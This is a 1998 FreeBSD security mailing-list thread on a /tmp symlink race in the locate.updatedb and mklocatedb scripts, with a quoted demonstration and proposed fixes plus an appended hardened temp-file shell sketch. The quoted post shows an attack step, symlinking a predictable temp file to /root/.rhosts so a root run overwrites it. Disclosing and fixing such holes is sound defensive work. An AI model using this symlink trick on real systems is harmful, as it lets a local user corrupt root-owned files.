Date:      Fri, 24 Apr 1998 20:40:08 +1000 (EST)
From:      Nicholas Charles Brawn <ncb05@uow.edu.au>
To:        freebsd-security@FreeBSD.ORG
Subject:   Re: Symlinks again...
Message-ID:  <Pine.SOL.3.96.980424203815.18480A-100000@banshee.cs.uow.edu.au>
In-Reply-To: <Pine.SOL.3.96.980423160425.8809A-100000@banshee.cs.uow.edu.au>

Time for a quick "oops" email. :)

Upon a little debate over whether or not /etc/weekly su's to nobody before
running locate.updatedb, I checked it out myself.

From /etc/weekly:
echo ""
echo "Rebuilding locate database:"
locdb=/var/db/locate.database
touch ${locdb}; chown nobody ${locdb}; chmod 644 ${locdb}
echo /usr/libexec/locate.updatedb | nice -5 su -fm nobody 2>&1 |\
        fgrep -v 'Permission denied'        ^^^^^^^^^^^^^ 
chmod 444 ${locdb}

I stand corrected. :)

Nicholas Brawn

--
Email: ncb05@uow.edu.au 
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.

On Thu, 23 Apr 1998, Nicholas Charles Brawn wrote:

> Another symlink problem.
> 
> The script /usr/libexec/locate.updatedb and /usr/libexec/locate.mklocatedb
> create predictable filenames in /tmp. Example attack is shown below.
> 
> nbrawn@devel:~$ uname -a
> FreeBSD devel 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Sun Apr 19 18:51:09 EST 
> 1998     root@devel:/usr/src/sys/compile/devel  i386
> nbrawn@devel:~$ ls /tmp
> total 2
> drwxrwxrwt   2 bin   bin    512 Apr 23 15:28 ./
> drwxr-xr-x  18 root  wheel  512 Apr 23 15:14 ../
> nbrawn@devel:~$ /usr/libexec/locate.updatedb
> 
> [1]+  Stopped                 /usr/libexec/locate.updatedb
> nbrawn@devel:~$ ls /tmp
> total 2
> drwxrwxrwt   2 bin     bin    512 Apr 23 15:28 ./
> drwxr-xr-x  18 root    wheel  512 Apr 23 15:14 ../
> -rw-------   1 nbrawn  bin      0 Apr 23 15:28 _mklocatedb575.list
> -rw-r--r--   1 nbrawn  bin      0 Apr 23 15:28 _updatedb571
> nbrawn@devel:~$ fg
> /usr/libexec/locate.updatedb
> locate.mklocatedb: cannot build locate database
> nbrawn@devel:~$ ps
>   PID  TT  STAT      TIME COMMAND
>   172  v2  Is     0:00.37 -bash (bash)
>   173  v3  Ss     0:00.96 -bash (bash)
>   584  v3  R+     0:00.00 ps
> nbrawn@devel:~$ ln -s /root/.rhosts /tmp/_mklocatedb591.list
> nbrawn@devel:~$ su
> Password:
> su-2.01# /usr/libexec/locate.updatedb 
> 
> [1]+  Stopped                 /usr/libexec/locate.updatedb
> su-2.01# ls /tmp
> total 2
> drwxrwxrwt   2 bin     bin    512 Apr 23 15:29 ./
> drwxr-xr-x  18 root    wheel  512 Apr 23 15:14 ../
> lrwxrwxrwx   1 nbrawn  bin     13 Apr 23 15:29 _mklocatedb591.list@ -> /root/.rhosts
> -rw-r--r--   1 root    bin      0 Apr 23 15:29 _updatedb587
> su-2.01# fg
> /usr/libexec/locate.updatedb
> su-2.01# ls /root/.rhosts
> -rw-------  1 root  wheel  439009 Apr 23 15:30 /root/.rhosts
> su-2.01# exit
> exit
> nbrawn@devel:~$
> 
> The problem appears easily fixed by editing the problem scripts and adding a
> few lines:
> 
> #!/bin/sh
> #
> # Copyright (c) September 1995 Wolfram Schneider <wosch@FreeBSD.org>. Berlin.
> # All rights reserved.
> 
> [snip]
> 
> # mklocatedb - build locate database
> # 
> # usage: mklocatedb [-presort] < filelist > database
> #
> # $Id: mklocatedb.sh,v 1.2.2.1 1997/12/13 18:21:02 sef Exp $
> 
> [snip]
> 
> umask 077			# protect temp files
> 
> export ROOTDIR=/var/run
> TMPDIR=${TMPDIR:-/tmp}; export TMPDIR
> if test X"$TMPDIR" = X -o ! -d "$TMPDIR"; then
> 	TMPDIR=/tmp; export TMPDIR
> fi
> 
> [snip]
> 
> if [ "$USER" != "root" ] 	# won't work if su'ing, someone think of a
> then				# better check :)
> bigrams=$TMPDIR/_mklocatedb$$.bigrams
> filelist=$TMPDIR/_mklocatedb$$.list
> else
> bigrams=$ROOTDIR/_mklocatedb$$.bigrams
> filelist=$ROOTDIR/_mklocatedb$$.list
> fi
> 
> How many other programs/scripts in FreeBSD -stable and -current are
> using /tmp that should be using /var/run?
> 
> Nicholas Brawn
> 
> ps, sorry for the long post :)
> --
> Email: ncb05@uow.edu.au
> Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe security" in the body of the message
> 
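
A hardened alternative to the predictable $TMPDIR/_mklocatedb$$.list names discussed in this thread, as an added example that is not part of the original e-mails or of FreeBSD's scripts. The function names are hypothetical and the sketch assumes a system that provides mktemp -d.

```shell
#!/bin/sh
# Added example: two ways for a script to create working files in a shared
# temporary directory without trusting a guessable name.

# Create a private, unpredictably named directory (mode 0700). Working files
# placed inside it cannot be pre-created or symlinked by another local user.
private_workdir() {
    ( umask 077; mktemp -d "${TMPDIR:-/tmp}/mklocatedb.XXXXXXXXXX" )
}

# Create a file only if nothing exists at that name. With noclobber (set -C)
# the redirection fails on an existing file, and shells such as bash and dash
# create the new file with O_CREAT|O_EXCL, which fails on a dangling symlink
# instead of following it. The subshell keeps set -C local to this call.
create_excl() {
    ( set -C; umask 077; : > "$1" ) 2>/dev/null
}

# Self-check on constructed data, confined to a scratch directory.
selfcheck() {
    scratch=$(private_workdir) || return 1
    # Constructed stand-in for a name that already exists as a symlink.
    ln -s "$scratch/victim" "$scratch/_mklocatedb123.list"
    if create_excl "$scratch/_mklocatedb123.list"; then
        rm -rf "$scratch"; echo "FAIL: wrote through existing symlink"; return 1
    fi
    # The link target must not have been created as a side effect.
    [ ! -e "$scratch/victim" ] || { rm -rf "$scratch"; return 1; }
    # A fresh name inside the private directory is created normally.
    create_excl "$scratch/filelist" || { rm -rf "$scratch"; return 1; }
    rm -rf "$scratch"
    echo "ok"
}
```

In a script like locate.mklocatedb, the bigrams and filelist variables would point inside the directory returned by private_workdir, with a trap removing it on exit.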
